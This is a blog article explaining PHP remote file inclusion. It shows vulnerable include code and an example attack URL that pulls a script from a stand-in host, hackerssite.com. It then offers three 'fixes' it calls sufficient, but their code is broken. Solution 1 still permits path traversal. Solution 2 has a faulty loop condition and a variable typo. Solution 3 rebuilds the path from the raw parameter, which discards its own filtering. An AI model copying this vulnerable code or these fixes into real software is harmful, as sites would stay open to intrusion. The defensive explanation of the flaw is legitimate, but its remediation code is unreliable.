Beware of remote code injection exploit in PHP!

PHP is kind of convenient to build web pages that have common header and footer. This is the technique we normally use when coming to building corporate web sites to maintain same look and feel over the entire websites. For example in the following piece of code (index.php), it shows you how it’s used.

The index.php
<?php
      $page = $_REQUEST['p'].”.inc.php”;
      include “header.inc.php”;
      include $page;
      include “footer.inc.php”;
?>

In the code above, in red, shows that the content is determined by the variable $page, which is passed in as parameter through the request parameter $_REQUEST['p']. And the variable $page is concatenated with the complete extension “.inc.php” then to be included by the index.php page. This is kind of convenient as you can easily maintain the common header and footer that are included in the page “header.inc.php” and “footer.inc.php”.

A common example is normally seen in most corporate web pages building using PHP, such as you have a menu bar in your header page that presents hyperlinks to various pages, such as the home page, contact us, about us, tell a friend etc. Which each of hyperlinks uses the parameter p to direct the main index.php page to switch to different body content.

The header.inc.php
<html>
      <head><title>My Index Page</title></head>
      <body>
      <div class=”topMenu”>
         <span class=”menuTab”><a href=“index.php?p=home”>Home</a></span>
         <span class=”menuTab”><a href=“index.php?p=tellafren”>Tell A Pal</a></span>
         <span class=”menuTab”><a href=“index.php?p=aboutus”>About Us</a></span>
         <span class=”menuTab”><a href=“index.php?p=contactus”>Contact Us</a></span>
      </div>

Although it’s such a highly convenient and easy way to maintain common theme and look and feel over the entire websites, but this opens up big vulnerability to hackers. PHP is such a convenient scripting language, the include function works NOT only for local pages that reside on your web server’s hard drive, but it also can include a page that resides on a remote web server. If the above code, the index.php doesn’t take extra precaution in coding such as extra filtering or removing slashes or detecting the allowed pages only, then hacker can easily execute code injection, by getting your index.php to include a remote script that resides on hacker’s computer. For example, your website is www.mywebsite.com, and you have the index.php that uses the p parameter to switch to different body’s content, then the hacker will do as follows by using any web client or browser

http://www.mywebsite.com/index.php?p=http://hackerssite.com/remoteharmfulscripts

Once the hacker has executed the above URL, your website will include the remote script, which will subsequently do harmful things to your web server. Such as downloading a phishing or other hacking script or execute a phpinfo() command, which subsequently finds out more details of your web server and then proceed for hacking etc. (Please note, in this example the hacker will put a script with a file name of “remoteharmfulscripts.inc.php” on their remote server, hackerssite.com. And of course the hacker will configure his web server to output the “remoteharmfulscripts.inc.php” as plain text only in order to inject code to your script.)

This hacking is recently quite common, which hackers found that a website is using that technique and hackable, they will carry out the code injection, which is commonly seen including using the website to download a phishing script to phish PayPal or Amazon or any e-banking accounts. If your site is hosted with a good hosting company, then this nasty action will be detected and you’re considered to have abused the the hosting package and you’ll get suspended of your site until you’ve fixed your code. If you have your own server, then you’d probably fall into law suit being sued as a website or misidentified as the hacker that initiated the phishing or hacking script to hack other websites.

How do we prevent the code injection hacking
In order to avoid code injection, you’ll need to some extra coding for filtering and checking, and a few methods as follows will do:

Solution 1. Using absolute path of local pages to be included, which the parent folder will be concatenated with your p parameter to form a complete path and use file_exists() function to check if the page exists locally then only do the include in your page. For example as follows, the index.php has become:

The index.php
<?php
      define (‘ABPATH’,'/home/mywebsite/www/’);
      // Using absolute path of local pages
      $page = ABPATH.$_REQUEST['p'].”.inc.php”;
      include “header.inc.php”;

      // Include the page only if the file exists
      if ( file_exists($page))
            include $page;
      else
            echo ‘The page ain’t exists!!!’;

      include “footer.inc.php”;
?>

Solution 2. Provide a checking in your script to check for valid pages and include only a valid page.

<?php
      // List of valid pages
      $page = $_REQUEST['p'].”.inc.php”;
      $mypages=array(‘aboutus.inc.php’,'home.inc.php’,'tellafren.inc.php’,'contactus.inc.php’);
      $valid=false;
      for ($i=0; $i<sizeof($mypages) || !$valid; $i++) {
            Check if page is valid
            if ($page==$mypage[$i]) {
                        $valid=true;
            }
      }
      if ($valid) include($page);
      if (!$valid) include($mypages[0]); //include the 1st page if not valid
      include “footer.inc.php”;
?>

Solution 3. Check for invalid characters and remove them and put pages to be included in a subfolder.

<?php
      // Invalid characters
      $invalidChars=array(“/”,”.”,”",”"”,”;”);
      $page = $_REQUEST['p'].”.inc.php”;
      // Removing invalid characters
      $page=str_replace($invalidChars,”",$page);
      $page=”mypagesFolder/”.$_REQUEST['p'].”.inc.php”;
      $page=”mypagesFolder/”.$page.”.inc.php”;
      include $page;
      include “footer.inc.php”;
?>

Applying any of the above solutions, shall save your PHP from being hacked using code injection technique. Solution 2 and 3 are taken from TheServerPages

Enter your email address to subscribe our newsletter or feed for FREE:

Delivered by FeedBurner


Bookmark with:

[Delicious]    [Digg]    [Reddit]    [Facebook]    [StumbleUpon]

0 Responses to “Beware of remote code injection exploit in PHP!”


  1. No Comments

Leave a Reply

You must login to post a comment.